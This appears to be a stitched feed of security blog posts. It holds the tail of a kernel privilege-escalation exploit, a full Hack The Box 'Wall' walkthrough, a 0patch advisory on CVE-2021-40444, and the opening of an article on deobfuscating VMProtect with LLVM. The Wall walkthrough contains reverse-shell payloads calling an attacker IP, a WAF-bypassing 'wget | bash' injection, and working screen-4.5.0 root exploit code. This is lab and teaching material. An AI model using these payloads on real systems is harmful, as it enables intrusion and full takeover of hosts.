				addr[credIt++] = 0;
		
			if (getuid() == 0){
			
				printf("\033[32m[*] Cred structure found ! ptr: %p, crednum: %d\n", addr, credNum);
				puts("\033[32m[*] Got Root");
				puts("\033[32m[+] Spawning a shell");

				credIt += 1; 
				addr[credIt++] = 0xffffffff;
				addr[credIt++] = 0xffffffff;
				addr[credIt++] = 0xffffffff;
				addr[credIt++] = 0xffffffff;
				addr[credIt++] = 0xffffffff;
				addr[credIt++] = 0xffffffff;
				addr[credIt++] = 0xffffffff;
				addr[credIt++] = 0xffffffff;
				addr[credIt++] = 0xffffffff;
				addr[credIt++] = 0xffffffff;

				execl("/bin/sh","-", (char *)NULL);
				puts("\033[93m[!] Execl failed...");
			
				break;
			}
			else{
				
				credIt = 0;
				addr[credIt++] = uid;
				addr[credIt++] = uid;
				addr[credIt++] = uid;
				addr[credIt++] = uid;
				addr[credIt++] = uid;
				addr[credIt++] = uid;
				addr[credIt++] = uid;
				addr[credIt++] = uid;
			}
		}
	addr++;
	}

	return 0;
}

And finally:

dzonerzy@smasher2:/dev/shm$ ./pwn 
[+] PID: 1153
[*] Open OK fd: 3
[*] mmap OK address: 42424000
[+] Searching for the process cred structure ...
[*] Cred structure found ! ptr: 0xb60ad084, crednum: 20
[*] Got Root
[+] Spawning a shell
# whoami
root
# id
uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),30(dip),46(plugdev),111(lpadmin),112(sambashare),1000(dzonerzy)
# 




We owned root!
That’s it, feedback is appreciated!
Don’t forget to read the previous write-ups, tweet about the write-up if you liked it, and follow on Twitter: @Ahm3d_H3sham
Thanks for reading.

Previous Hack The Box write-up : Hack The Box - Wall
Next Hack The Box write-up : Hack The Box - Craft

Hack The Box - Wall

By: 0xRick
7 December 2019 at 05:00

Hack The Box - Wall

Quick Summary

Hey guys, today Wall retired and here’s my write-up about it. It was an easy Linux machine with a web application vulnerable to RCE, a WAF bypass needed to exploit that vulnerability, and a vulnerable suid binary for privilege escalation. Its IP is 10.10.10.157 and I added it to /etc/hosts as wall.htb. Let’s jump right in!


Nmap

As always we will start with nmap to scan for open ports and services:

root@kali:~/Desktop/HTB/boxes/wall# nmap -sV -sT -sC -o nmapinitial wall.htb 
Starting Nmap 7.80 ( https://nmap.org ) at 2019-12-06 13:59 EST
Nmap scan report for wall.htb (10.10.10.157)
Host is up (0.50s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 2e:93:41:04:23:ed:30:50:8d:0d:58:23:de:7f:2c:15 (RSA)
|   256 4f:d5:d3:29:40:52:9e:62:58:36:11:06:72:85:1b:df (ECDSA)
|_  256 21:64:d0:c0:ff:1a:b4:29:0b:49:e1:11:81:b6:73:66 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 241.17 seconds
root@kali:~/Desktop/HTB/boxes/wall# 

We got http on port 80 and ssh on port 22. Let’s check the web service.

Web Enumeration

The index page was just the default apache page:


So I ran gobuster and got these results:

root@kali:~/Desktop/HTB/boxes/wall# gobuster dir -u http://wall.htb/ -w /usr/share/wordlists/dirb/common.txt 
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://wall.htb/
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2019/12/06 14:08:02 Starting gobuster
===============================================================
/.hta (Status: 403)
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/index.html (Status: 200)
/monitoring (Status: 401)
/server-status (Status: 403)

The only interesting thing was /monitoring, however that path was protected by basic http authentication:


I didn’t have credentials. I tried bruteforcing them, but that didn’t work, so I spent some time enumerating; I couldn’t find the credentials anywhere. It turns out that by changing the request method from GET to POST we can bypass the authentication:

root@kali:~/Desktop/HTB/boxes/wall# curl -X POST http://wall.htb/monitoring/
<h1>This page is not ready yet !</h1>
<h2>We should redirect you to the required page !</h2>

<meta http-equiv="refresh" content="0; URL='/centreon'" />

root@kali:~/Desktop/HTB/boxes/wall# 

The response was a redirection to /centreon:


Centreon is a network, system, applicative supervision and monitoring tool. -github

Bruteforcing the credentials through the login form would require writing a script because there’s a CSRF token that changes with every request; alternatively, we can use the API.
According to the authentication part of the API documentation, we can send a POST request to /api/index.php?action=authenticate with the credentials. If the credentials are valid it will respond with the authentication token, otherwise it will respond with a 403.
I used wfuzz with darkweb2017-top10000.txt from seclists:

root@kali:~/Desktop/HTB/boxes/wall# wfuzz -c -X POST -d "username=admin&password=FUZZ" -w ./darkweb2017-top10000.txt http://wall.htb/centreon/api/index.php?action=authenticate

Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.

********************************************************
* Wfuzz 2.4 - The Web Fuzzer                           *
********************************************************
Target: http://wall.htb/centreon/api/index.php?action=authenticate
Total requests: 10000
===================================================================
ID           Response   Lines    Word     Chars       Payload
===================================================================
000000005:   403        0 L      2 W      17 Ch       "qwerty"
000000006:   403        0 L      2 W      17 Ch       "abc123"
000000008:   200        0 L      1 W      60 Ch       "password1"
000000004:   403        0 L      2 W      17 Ch       "password"
000000007:   403        0 L      2 W      17 Ch       "12345678"
000000009:   403        0 L      2 W      17 Ch       "1234567"
000000010:   403        0 L      2 W      17 Ch       "123123"
000000001:   403        0 L      2 W      17 Ch       "123456"
000000002:   403        0 L      2 W      17 Ch       "123456789"
000000003:   403        0 L      2 W      17 Ch       "111111"
000000011:   403        0 L      2 W      17 Ch       "1234567890"
000000012:   403        0 L      2 W      17 Ch       "000000"
000000013:   403        0 L      2 W      17 Ch       "12345"
000000015:   403        0 L      2 W      17 Ch       "1q2w3e4r5t" 
^C
Finishing pending requests...
root@kali:~/Desktop/HTB/boxes/wall# 

password1 resulted in a 200 response, so it’s the right password:



RCE | WAF Bypass –> Shell as www-data

I checked the version of centreon and it was 19.04:


It was vulnerable to RCE (CVE-2019-13024, discovered by the author of the box) and there was an exploit for it:

root@kali:~/Desktop/HTB/boxes/wall# searchsploit centreon
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                                                                                                                                                    |  Path
                                                                                                                                                                                                  | (/usr/share/exploitdb/)
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
----------
 Redacted
----------
Centreon 19.04  - Remote Code Execution                                                                                                                                                           | exploits/php/webapps/47069.py
----------
 Redacted
----------
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
root@kali:~/Desktop/HTB/boxes/wall# 

But when I tried to run the exploit I didn’t get a shell:


So I started looking at the exploit code and tried to do it manually.
The vulnerability is in the poller configuration page (/main.get.php?p=60901):

    poller_configuration_page = url + "/main.get.php?p=60901"

The script attempts to configure a poller and this is the payload that’s sent in the POST request:

    payload_info = {
        "name": "Central",
        "ns_ip_address": "127.0.0.1",
        # this value should be 1 always
        "localhost[localhost]": "1",
        "is_default[is_default]": "0",
        "remote_id": "",
        "ssh_port": "22",
        "init_script": "centengine",
        # this value contains the payload , you can change it as you want
        "nagios_bin": "ncat -e /bin/bash {0} {1} #".format(ip, port),
        "nagiostats_bin": "/usr/sbin/centenginestats",
        "nagios_perfdata": "/var/log/centreon-engine/service-perfdata",
        "centreonbroker_cfg_path": "/etc/centreon-broker",
        "centreonbroker_module_path": "/usr/share/centreon/lib/centreon-broker",
        "centreonbroker_logs_path": "",
        "centreonconnector_path": "/usr/lib64/centreon-connector",
        "init_script_centreontrapd": "centreontrapd",
        "snmp_trapd_path_conf": "/etc/snmp/centreon_traps/",
        "ns_activate[ns_activate]": "1",
        "submitC": "Save",
        "id": "1",
        "o": "c",
        "centreon_token": poller_token,


    }

nagios_bin is the vulnerable parameter:

        # this value contains the payload , you can change it as you want
        "nagios_bin": "ncat -e /bin/bash {0} {1} #".format(ip, port),

I checked the configuration page and looked at the HTML source; nagios_bin is the monitoring engine binary, so I tried to inject a command there:


When I tried to save the configuration I got a 403:


That’s because there’s a WAF blocking these attempts. I could bypass the WAF by replacing the spaces in the commands with ${IFS}. I saved the reverse shell payload in a file named a, then used wget to fetch the file contents and piped them to bash.

Contents of a:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.xx.xx 1337 >/tmp/f 

modified parameter:

"nagios_bin": "wget${IFS}-qO-${IFS}http://10.10.xx.xx/a${IFS}|${IFS}bash;"
root@kali:~/Desktop/HTB/boxes/wall# python exploit.py http://wall.htb/centreon/ admin password1 10.10.xx.xx 1337
[+] Retrieving CSRF token to submit the login form
exploit.py:38: UserWarning: No parser was explicitly specified, so I'm using the best available HTML parser for this system ("lxml"). This usually isn't a problem, but if you run this code on another system, or in a different virtual e
nvironment, it may use a different parser and behave differently.

The code that caused this warning is on line 38 of the file exploit.py. To get rid of this warning, pass the additional argument 'features="lxml"' to the BeautifulSoup constructor.

  soup = BeautifulSoup(html_content)
[+] Login token is : ba28f431a995b4461731fb394eb01d79
[+] Logged In Sucssfully
[+] Retrieving Poller token
exploit.py:56: UserWarning: No parser was explicitly specified, so I'm using the best available HTML parser for this system ("lxml"). This usually isn't a problem, but if you run this code on another system, or in a different virtual e
nvironment, it may use a different parser and behave differently.

The code that caused this warning is on line 56 of the file exploit.py. To get rid of this warning, pass the additional argument 'features="lxml"' to the BeautifulSoup constructor.

  poller_soup = BeautifulSoup(poller_html)
[+] Poller token is : d5702ae3de1264b0692afcef86074f07
[+] Injecting Done, triggering the payload
[+] Check your netcat listener !
root@kali:~/Desktop/HTB/boxes/wall# nc -lvnp 1337
listening on [any] 1337 ...
connect to [10.10.xx.xx] from (UNKNOWN) [10.10.10.157] 37862
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$ which python             
/usr/bin/python
$ python -c "import pty;pty.spawn('/bin/bash')"
www-data@Wall:/usr/local/centreon/www$ ^Z
[1]+  Stopped                 nc -lvnp 1337
root@kali:~/Desktop/HTB/boxes/wall# stty raw -echo 
root@kali:~/Desktop/HTB/boxes/wall# nc -lvnp 1337

www-data@Wall:/usr/local/centreon/www$ export TERM=screen
www-data@Wall:/usr/local/centreon/www$ 

Screen 4.5.0 –> Root Shell –> User & Root Flags

There were two users on the box, shelby and sysmonitor. I couldn’t read the user flag as www-data:

www-data@Wall:/usr/local/centreon/www$ cd /home
www-data@Wall:/home$ ls -al
total 16
drwxr-xr-x  4 root       root       4096 Jul  4 00:38 .
drwxr-xr-x 23 root       root       4096 Jul  4 00:25 ..
drwxr-xr-x  6 shelby     shelby     4096 Jul 30 17:37 shelby
drwxr-xr-x  5 sysmonitor sysmonitor 4096 Jul  6 15:07 sysmonitor
www-data@Wall:/home$ cd shelby
www-data@Wall:/home/shelby$ cat user.txt 
cat: user.txt: Permission denied
www-data@Wall:/home/shelby$

I searched for suid binaries and saw screen-4.5.0; similar to the privesc in Flujab, I used this exploit.
The exploit script didn’t work properly so I did it manually. I compiled the binaries on my box.

libhax.c:

#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
__attribute__ ((__constructor__))
void dropshell(void){
    chown("/tmp/rootshell", 0, 0);
    chmod("/tmp/rootshell", 04755);
    unlink("/etc/ld.so.preload");
    printf("[+] done!\n");
}

rootshell.c:

#include <stdio.h>
int main(void){
    setuid(0);
    setgid(0);
    seteuid(0);
    setegid(0);
    execvp("/bin/sh", NULL, NULL);
}
root@kali:~/Desktop/HTB/boxes/wall/privesc# nano libhax.c
root@kali:~/Desktop/HTB/boxes/wall/privesc# nano rootshell.c
root@kali:~/Desktop/HTB/boxes/wall/privesc# gcc -fPIC -shared -ldl -o libhax.so libhax.c
libhax.c: In function dropshell:
libhax.c:7:5: warning: implicit declaration of function chmod [-Wimplicit-function-declaration]
    7 |     chmod("/tmp/rootshell", 04755);
      |     ^~~~~
root@kali:~/Desktop/HTB/boxes/wall/privesc# gcc -o rootshell rootshell.c
rootshell.c: In function main:
rootshell.c:3:5: warning: implicit declaration of function setuid [-Wimplicit-function-declaration]
    3 |     setuid(0);
      |     ^~~~~~
rootshell.c:4:5: warning: implicit declaration of function setgid [-Wimplicit-function-declaration]
    4 |     setgid(0);
      |     ^~~~~~
rootshell.c:5:5: warning: implicit declaration of function seteuid [-Wimplicit-function-declaration]
    5 |     seteuid(0);
      |     ^~~~~~~
rootshell.c:6:5: warning: implicit declaration of function setegid [-Wimplicit-function-declaration]
    6 |     setegid(0);
      |     ^~~~~~~
rootshell.c:7:5: warning: implicit declaration of function execvp [-Wimplicit-function-declaration]
    7 |     execvp("/bin/sh", NULL, NULL);
      |     ^~~~~~
rootshell.c:7:5: warning: too many arguments to built-in function execvp expecting 2 [-Wbuiltin-declaration-mismatch]
root@kali:~/Desktop/HTB/boxes/wall/privesc#

Then I uploaded them to the box and did the rest of the exploit:

www-data@Wall:/home/shelby$ cd /tmp/
www-data@Wall:/tmp$ wget http://10.10.xx.xx/libhax.so
--2019-12-07 00:23:12--  http://10.10.xx.xx/libhax.so
Connecting to 10.10.xx.xx:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16144 (16K) [application/octet-stream]
Saving to: 'libhax.so'

libhax.so           100%[===================>]  15.77K  11.7KB/s    in 1.3s    

2019-12-07 00:23:14 (11.7 KB/s) - 'libhax.so' saved [16144/16144]

www-data@Wall:/tmp$ wget http://10.10.xx.xx/rootshell
--2019-12-07 00:23:20--  http://10.10.xx.xx/rootshell
Connecting to 10.10.xx.xx:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16832 (16K) [application/octet-stream]
Saving to: 'rootshell'

rootshell           100%[===================>]  16.44K  16.3KB/s    in 1.0s    

2019-12-07 00:23:22 (16.3 KB/s) - 'rootshell' saved [16832/16832]

www-data@Wall:/tmp$ 
www-data@Wall:/tmp$ cd /etc
www-data@Wall:/etc$ umask 000
www-data@Wall:/etc$ /bin/screen-4.5.0 -D -m -L ld.so.preload echo -ne  "\x0a/tmp/libhax.so"
www-data@Wall:/etc$ /bin/screen-4.5.0 -ls
' from /etc/ld.so.preload cannot be preloaded (cannot open shared object file): ignored.
[+] done!
No Sockets found in /tmp/screens/S-www-data.

www-data@Wall:/etc$ /tmp/rootshell
# whoami
root
# id
uid=0(root) gid=0(root) groups=0(root),33(www-data),6000(centreon)
# 




And we owned root!
That’s it, feedback is appreciated!
Don’t forget to read the previous write-ups, tweet about the write-up if you liked it, and follow on Twitter: @Ahm3d_H3sham
Thanks for reading.

Previous Hack The Box write-up : Hack The Box - Heist
Next Hack The Box write-up : Hack The Box - Smasher2

Micropatches for the "File Extension" URL Scheme (CVE-2021-40444)

27 September 2021 at 13:21

 


 

by Mitja Kolsek, the 0patch Team

September 2021 Windows Updates brought a fix for CVE-2021-40444, a critical vulnerability in Windows that allowed a malicious Office document to download a remote executable file and execute it locally upon opening such a document. This vulnerability was found being exploited in the wild.

 

The Vulnerability

Unfortunately, CVE-2021-40444 does not cover just one flaw but two; this can lead to some confusion:

  1. Path traversal in CAB file extraction: The exploit was utilizing this flaw to place a malicious executable file in a known location instead of a randomly-named subfolder, where it would originally be extracted.

  2. "File extension" URL scheme: For some reason, Windows ShellExecute function, a very complex function capable of launching local applications in various ways including via URLs, supported an undocumented URL scheme mapped to registered file extensions on the computer. The exploit was utilizing this "feature" to launch the previously downloaded executable file with the Control Panel application and have it executed via URL ".cpl:../../../../../Temp/championship.cpl". In this case, ".cpl" was considered a URL scheme, and since .cpl extension is associated with control.exe, this app would get launched and given the provided path as an argument.

The second flaw is the more critical one, as there may exist various other ways to get a malicious file onto a user's computer (e.g., via the Downloads folder) and still exploit this second flaw to execute such a file.
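
To make this second flaw more tangible, here is a minimal sketch (not the exploit's code) of how such a URL reaches the vulnerable behavior; ShellExecuteW is the real Windows API call described above, while the target path and everything else in the snippet are illustrative assumptions:

#include <windows.h>
#include <shellapi.h>

int main() {
    // ".cpl" is treated as a URL scheme: since the .cpl extension is associated
    // with control.exe, that application gets launched and receives the rest of
    // the string as its argument (illustrative, harmless applet path).
    ShellExecuteW(nullptr, L"open",
                  L".cpl:../../../Windows/System32/appwiz.cpl",
                  nullptr, nullptr, SW_SHOWNORMAL);
    return 0;
}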

 

Microsoft's Patch

What Microsoft's patch did was add a check before calling ShellExecute on the provided URL, blocking URL schemes that begin with a non-alphanumeric character (which rules out schemes beginning with a dot such as ".cpl") and further limiting the allowed set of characters for the remaining string.
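
For illustration only, the kind of check described could be approximated as follows; the function name, the exact allowed character set and the overall structure are assumptions made for the sake of the example, not Microsoft's actual code:

#include <cwctype>
#include <string>

// Hypothetical approximation of the added validation: reject URL "schemes"
// that start with a non-alphanumeric character (which rules out ".cpl:") and
// restrict the remaining scheme characters to a conservative set.
static bool IsUrlSchemeAllowed(const std::wstring &url) {
    size_t colon = url.find(L':');
    if (colon == std::wstring::npos || colon == 0)
        return false;                              // no scheme to speak of
    if (!std::iswalnum(url[0]))
        return false;                              // blocks ".cpl:", "-x:", ...
    for (size_t i = 1; i < colon; ++i) {
        wchar_t c = url[i];
        if (!std::iswalnum(c) && c != L'+' && c != L'-' && c != L'.')
            return false;                          // conservative charset
    }
    return true;
}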

Note that ShellExecute function itself was not patched, and you can still launch a DLL via the Control Panel app by clicking the Windows Start button and typing in a ".cpl:/..." URL. Effectively, therefore, support for the "File extension" URL scheme was not eliminated across entire Windows, just made inaccessible from applications utilizing Internet Explorer components for opening URLs. Hopefully remotely delivered content can't find some other way towards ShellExecute that bypasses this new security check.


Our Micropatch

Microsoft's update fixed both flaws, but we decided to only patch the "File extension" URL scheme flaw until someone demonstrates the first flaw to be exploitable by itself.

The "File extension" URL scheme flaw was actually present in two places, in mshtml.dll (reachable from Office documents) and in ieframe.dll (reachable from Internet Explorer), so we had to patch both these executables.

Since an official vendor fix is available, it was our goal to provide patches for affected Windows versions that we have "security-adopted", as they're not receiving official vendor patches anymore. Among these, our tests have shown that only Windows 10 v1803 and v1809 were affected; the File Extension URL scheme "feature" was apparently added in Windows 8.1.

We expect many Windows 10 v1903 machines out there may also be affected, so we decided to port the micropatch to this version as well.

Our CVE-2021-40444 micropatches are therefore available for: 

  1. Windows 10 v1803 32bit or 64bit (updated with May 2021 Updates - latest before end of support)
  2. Windows 10 v1809 32bit or 64bit (updated with May 2021 Updates - latest before end of support) 
  3. Windows 10 v1903 32bit or 64bit (updated with December 2020 Updates - latest before end of support) 


Below is a video of our patch in action. Notice that with 0patch disabled, Calculator is launched both upon opening the Word document and upon previewing the RTF document in Windows Explorer Preview. In both cases, Process Monitor shows that control.exe gets launched, which loads the "malicious" executable, in our case spawning Calculator. With 0patch enabled, control.exe does not get launched, and therefore neither does Calculator.




In line with our guidelines, these patches require a PRO license. To obtain them and have them applied on your computer(s) along with other micropatches included with a PRO license, create an account in 0patch Central, install 0patch Agent and register it to your account, then purchase 0patch PRO.
For a free trial, contact [email protected].
 
Note that no computer restart is needed for installing the agent or applying/un-applying any 0patch micropatches.

We'd like to thank Will Dormann for an in-depth public analysis of this vulnerability, which helped us create a micropatch and protect our users.

To learn more about 0patch, please visit our Help Center.

Tickling VMProtect with LLVM: Part 1

By: fvrmatteo
8 September 2021 at 23:00

This series of posts delves into a collection of experiments I did in the past while playing around with LLVM and VMProtect. I recently decided to dust off the code, organize it a bit better and attempt to share some knowledge in such a way that could be helpful to others. The macro topics are divided as follows:

Foreword

First, let me list some important events that led to my curiosity for reversing obfuscation solutions and attack them with LLVM.

  • In 2017, a group of friends (SmilingWolf, mrexodia and xSRTsect) and I hacked up a Python-based devirtualizer and solved a couple of VMProtect challenges posted on the Tuts4You forum. That was my first experience reversing a known commercial protector, and it taught me that writing compiler-like optimizations, especially built on top of a not so well-designed IR, can be an awful adventure.
  • In 2018, a person nicknamed RYDB3RG posted on Tuts4You a first insight on how LLVM optimizations could be beneficial when optimizing VMProtected code, although the easy example that was provided left me with a lot of questions on whether that approach would be hassle-free or not.
  • In 2019, at the SPRO conference in London, Peter and I presented a paper titled “SATURN - Software Deobfuscation Framework Based On LLVM”, proposing, you guessed it, a software deobfuscation framework based on LLVM and describing the related pros/cons.

The ideas documented in this post come from insights obtained during the aforementioned research efforts, fine-tuned specifically to get a good-enough output prior to the recompilation/decompilation phases, and should be considered as stable as a proof-of-concept can be.

Before anyone starts a war about which framework is better for the job, pause a few seconds and search the truth deep inside you: every framework has pros/cons and everything boils down to choosing which framework to get mad at when something doesn’t work. I personally decided to get mad at LLVM, which over time proved to be a good research playground, rich with useful analysis and optimizations, consistently maintained, sporting a nice community and deeply entangled with the academic and industry worlds.

With that said, it’s crystal clear that LLVM is not born as a software deobfuscation framework, so scratching your head for hours, diving into its internals and bending them to your needs is a minimum requirement to achieve your goals.

I apologize in advance for the ample presence of long-ish code snippets, but I wanted the reader to have the relevant C++ or LLVM-IR code under their nose while discussing it.

Lifting

The following diagram shows a high-level overview of all the actions and components described in the upcoming sections. The blue blocks represent the inputs, the yellow blocks the actions, the white blocks the intermediate information and the purple block the output.

Lifting pipeline

Enough words or code have been spent by others (1, 2, 3, 4) describing the virtual machine architecture used by VMProtect, so the next paragraph will quickly sum up the involved data structures with an eye on some details that will be fundamental to make LLVM’s job easier. To further simplify the explanation, the following paragraphs will assume the handling of x64 code virtualized by VMProtect 3.x. Drawing a parallel with x86 is trivial.

Liveness and aliasing information

Let’s start by saying that many deobfuscation tools completely disregard, or at best unsoundly handle, any information related to the aliasing properties bound to the memory accesses present in the code under analysis. LLVM, on the contrary, is a framework that bases a lot of its optimization passes on precise aliasing information, in such a way that the semantic correctness of the code is preserved. Additionally, LLVM has strong optimization passes benefiting from precise liveness information, which we absolutely want to take advantage of to clean up any stores to memory that are irrelevant after the execution of the virtualized code.

This means that we need to pause for a moment to think about the properties of the data structures involved in the code that we are going to lift, keeping in mind how they may alias with each other, for how long we need them to hold their values and if there are safe assumptions that we can feed to LLVM to obtain the best possible result.

A suboptimal representation of the data structures is most likely going to lead to suboptimal lifted code because the LLVM’s optimizations are going to be hindered by the lack of information, erring on the safe side to keep the code semantically correct. Way worse though, is the case where an unsound assumption is going to lead to lifted code that is semantically incorrect.

At a high level we can summarize the data-related virtual machine components as follows:

  • 30 virtual registers: used internally by the virtual machine. Their liveness scope starts after the VmEnter, when they are initialized with the incoming host execution context, and ends before the VmExit(s), when their values are copied to the outgoing host execution context. Therefore their state should not persist outside the virtualized code. They are allocated on the stack, in a memory chunk that can only be accessed by specific VmHandlers and is therefore guaranteed to be inaccessible by an arbitrary stack access executed by the virtualized code. They are independent from one another, so writing to one won’t affect the others. During the virtual execution they can be accessed as a whole or in subregisters. From now on referred to as VmRegisters.

  • 19 passing slots: used by VMProtect to pass the execution state from one VmBlock to another. Their liveness starts at the epilogue of a VmBlock and ends at the prologue of the successor VmBlock(s). They are allocated on the stack and, while alive, they are only accessed by the push/pop instructions at the epilogue/prologue of each VmBlock. They are independent from one another and always accessed as a whole stack slot. From now on referred to as VmPassingSlots.

  • 16 general purpose registers: pushed to the stack during the VmEnter, loaded and manipulated by means of the VmRegisters and popped from the stack during the VmExit(s), reflecting the changes made to them during the virtual execution. Their liveness scope starts before the VmEnter and ends after the VmExit(s), so their state must persist after the execution of the virtualized code. They are independent from one another, so writing to one won’t affect the others. Contrarily to the VmRegisters, the general purpose registers are always accessed as a whole. The flags register is also treated as the general purpose registers liveness-wise, but it can be directly accessed by some VmHandlers.

  • 4 general purpose segments: the FS and GS general purpose segment registers have their liveness scope matching with the general purpose registers and the underlying segments are guaranteed not to overlap with other memory regions (e.g. SS, DS). On the contrary, accesses to the SS and DS segments are not always guaranteed to be distinct with each other. The liveness of the SS and DS segments also matches with the general purpose registers. A little digression: in the past I noticed that some projects were lifting the stack with an intra-virtual function scope which, in my experience, may cause a number of problems if the virtualized code is not a function with a well-formed stack frame, but rather a shellcode that pops some value pushed prior to entering the virtual machine or pushes some value that needs to live after exiting the virtual machine.

Helper functions

With the information gathered from the previous section, we can proceed with defining some basic LLVM-IR structures that will then be used to lift the individual VmHandlers, VmBlocks and VmFunctions.

When I first started with LLVM, my approach to generate the needed structures or instruction chains was through the IRBuilder class, but I quickly realized that I was spending more time looking at the documentation to generate the required types and instructions than actually focusing on designing them. Then, while working on SATURN, it became obvious that following Remill’s approach is a winning strategy, at least for the initial high level design phase. In fact their idea is to implement the structures and semantics in C++, compile them to LLVM-IR and dynamically load the generated bitcode file to be used by the lifter.

Without further ado, the following is a minimal implementation of a stub function that we can use as a template to lift a VmStub (virtualized code between a VmEnter and one or more VmExit(s)):

struct VirtualRegister final {
  union {
    alignas(1) struct {
      uint8_t b0;
      uint8_t b1;
      uint8_t b2;
      uint8_t b3;
      uint8_t b4;
      uint8_t b5;
      uint8_t b6;
      uint8_t b7;
    } byte;
    alignas(2) struct {
      uint16_t w0;
      uint16_t w1;
      uint16_t w2;
      uint16_t w3;
    } word;
    alignas(4) struct {
      uint32_t d0;
      uint32_t d1;
    } dword;
    alignas(8) uint64_t qword;
  } __attribute__((packed));
} __attribute__((packed));

using rref = size_t &__restrict__;

extern "C" uint8_t RAM[0];
extern "C" uint8_t GS[0];
extern "C" uint8_t FS[0];

extern "C"
size_t HelperStub(
  rref rax, rref rbx, rref rcx,
  rref rdx, rref rsi, rref rdi,
  rref rbp, rref rsp, rref r8,
  rref r9, rref r10, rref r11,
  rref r12, rref r13, rref r14,
  rref r15, rref flags,
  size_t KEY_STUB, size_t RET_ADDR, size_t REL_ADDR,
  rref vsp, rref vip,
  VirtualRegister *__restrict__ vmregs,
  size_t *__restrict__ slots);

extern "C"
size_t HelperFunction(
  rref rax, rref rbx, rref rcx,
  rref rdx, rref rsi, rref rdi,
  rref rbp, rref rsp, rref r8,
  rref r9, rref r10, rref r11,
  rref r12, rref r13, rref r14,
  rref r15, rref flags,
  size_t KEY_STUB, size_t RET_ADDR, size_t REL_ADDR)
{
  // Allocate the temporary virtual registers
  VirtualRegister vmregs[30] = {0};
  // Allocate the temporary passing slots
  size_t slots[19] = {0};
  // Initialize the virtual registers
  size_t vsp = rsp;
  size_t vip = 0;
  // Force the relocation address to 0
  REL_ADDR = 0;
  // Execute the virtualized code
  vip = HelperStub(
    rax, rbx, rcx, rdx, rsi, rdi,
    rbp, rsp, r8, r9, r10, r11,
    r12, r13, r14, r15, flags,
    KEY_STUB, RET_ADDR, REL_ADDR,
    vsp, vip, vmregs, slots);
  // Return the next address(es)
  return vip;
}

The VirtualRegister structure is meant to represent a VmRegister, divided in smaller sub-chunks that are going to be accessed by the VmHandlers in ways that don’t necessarily match the access to the subregisters on the x64 architecture. As an example, virtualizing the 64 bits bswap instruction will yield VmHandlers accessing all the word sub-chunks of a VmRegister. The __attribute__((packed)) is meant to generate a structure without padding bytes, matching the exact data layout used by a VmRegister.

The rref definition is a convenience type adopted in the definition of the arguments used by the helper functions, that, once compiled to LLVM-IR, will generate a pointer parameter with a noalias attribute. The noalias attribute is hinting to the compiler that any memory access happening inside the function that is not dereferencing a pointer derived from the pointer parameter, is guaranteed not to alias with a memory access dereferencing a pointer derived from the pointer parameter.

The RAM, GS and FS array definitions are convenience zero-length arrays that we can use to generate indexed memory accesses to a generic memory slot (stack segment, data segment), GS segment and FS segment. The accesses will be generated as getelementptr instructions and LLVM will automatically treat a pointer with base RAM as not aliasing with a pointer with base GS or FS, which is extremely convenient to us.

The HelperStub function prototype is a convenience declaration that we’ll be able to use in the lifter to represent a single VmBlock. It accepts as parameters the sequence of general purpose register pointers, the flags register pointer, three key values (KEY_STUB, RET_ADDR, REL_ADDR) pushed by each VmEnter, the virtual stack pointer, the virtual program counter, the VmRegisters pointer and the VmPassingSlots pointer.

The HelperFunction function definition is a convenience template that we’ll be able to use in the lifter to represent a single VmStub. It accepts as parameters the sequence of general purpose register pointers, the flags register pointer and the three key values (KEY_STUB, RET_ADDR, REL_ADDR) pushed by each VmEnter. The body is declaring an array of 30 VmRegisters, an array of 19 VmPassingSlots, the virtual stack pointer and the virtual program counter. Once compiled to LLVM-IR they’ll be turned into alloca declarations (stack frame allocations), guaranteed not to alias with other pointers used into the function and that will be automatically released at the end of the function scope. As a convenience we are setting the REL_ADDR to 0, but that can be dynamically set to the proper REL_ADDR provided by the user according to the needs of the binary under analysis. Last but not least, we are issuing the call to the HelperStub function, passing all the needed parameters and obtaining as output the updated instruction pointer, that, in turn, will be returned by the HelperFunction too.

The global variable and function declarations are marked as extern "C" to avoid any form of name mangling. In fact we want to be able to fetch them from the dynamically loaded LLVM-IR Module using functions like getGlobalVariable and getFunction.
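
As a side note, a minimal sketch of how the lifter can load the generated bitcode and fetch those symbols follows; the file name and the lack of error reporting are just for the sake of the example:

#include <llvm/IR/LLVMContext.h>
#include <llvm/IR/Module.h>
#include <llvm/IRReader/IRReader.h>
#include <llvm/Support/SourceMgr.h>

#include <memory>

// Parse the helpers module and look up the unmangled symbols declared above
std::unique_ptr<llvm::Module> LoadHelpers(llvm::LLVMContext &Context) {
  llvm::SMDiagnostic Err;
  auto M = llvm::parseIRFile("HelperFunctions.ll", Err, Context);
  if (!M)
    return nullptr;
  // No name mangling to deal with, thanks to the extern "C" declarations
  llvm::Function *HelperFunction = M->getFunction("HelperFunction");
  llvm::Function *HelperStub = M->getFunction("HelperStub");
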